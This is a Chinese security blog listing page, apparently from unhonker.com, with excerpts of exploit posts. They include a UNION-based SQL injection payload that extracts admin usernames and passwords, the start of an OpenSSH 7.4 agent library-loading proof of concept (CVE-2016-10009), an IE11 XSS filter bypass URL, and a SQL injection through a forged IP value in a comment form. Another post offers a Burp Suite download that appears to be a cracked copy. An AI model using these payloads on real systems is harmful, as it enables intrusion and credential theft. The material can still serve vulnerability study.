• MySQL文件上传-ID参数SQL注入

    MySQL文件上传-ID参数SQL注入
    SQL Injection/Exploit : # http://localhost/[PATH]/download.php?id=[SQL]&t=files # -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6+from+admin-- -&t=files # http://localhost/[PATH]/download.php?id=[SQL]&t=images_title # -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6,7+...
    作者:unhonker| 发布:2017年2月08日 | 分类:漏洞公布 | 被撸:1,936次|
  • OpenSSH 7.4代理协议任意库加载漏洞

    OpenSSH 7.4代理协议任意库加载漏洞
    CVE-2016-10009 $ cat evil_lib.c #include <stdlib.h> __attribute__((constructor)) static void run(void) { // in case you're loading this via LD_PRELOAD or LD_LIBRARY_PATH, // prevent recursion through system() unsetenv("LD_PRELOAD"); unsetenv("LD_LIBRARY_PATH"); system("id > /tmp/test"); ...
    作者:unhonker| 发布:2016年12月25日 | 分类:漏洞公布 | 被撸:2,214次| 标签:
  • burpsuite V1.7.11

    burpsuite V1.7.11
    之前的版本貌似都集体失效了,这个版本是目前可以用的,刚测试了下。 下载地址: Burp v1.7
    作者:unhonker| 发布:2016年12月05日 | 分类:个人关注 | 被撸:1,986次| 标签:
  • IE11 XSS 过滤器绕过漏洞

    IE11 XSS 过滤器绕过漏洞
    EXP: http://unhonker.com/xss.php?x=%3Cmeta%20charset=cp1025%3E%27%20L%C9%86%D9%81%D4%85%40%C9%84~[%40%D6%95%D4%96%E4%A2%85%D6%A5%C5%99~m~%60JZ^NNm^mm~mNm^mmmm~mmNmm^mmmmmm~mmmmNmm^[JMOO}}N}}]JmZNMOO}}N}}]JmmZNMOO}}N}}]JmmmmZNMO}}N}}]JmZNM[N}}]JmmmmmmZZMm]n
    作者:unhonker| 发布:2016年6月14日 | 分类:漏洞公布 | 被撸:2,159次| 标签:
  • 青客云sql注入漏洞第二发

    青客云sql注入漏洞第二发
    本文出自红客联盟 太极实验室(ihonker.org) 这次不是延时注入,问题是出现在评论时获取ip处, 在发表评论的时候,发现,ip可以伪造,并且被带入到feedback数据库里面,一枚完美的注入产生了,在发表评论的时候,ip伪造下 8.8.8.8\",'IANA',user(),'','1463286558','0','','0')# 内容随便写,爆出了user() 其中1463286558表示的是时间 其中获取ip的函数 function g...
    作者:unhonker| 发布:2016年6月07日 | 分类:漏洞公布 | 被撸:2,219次| 标签: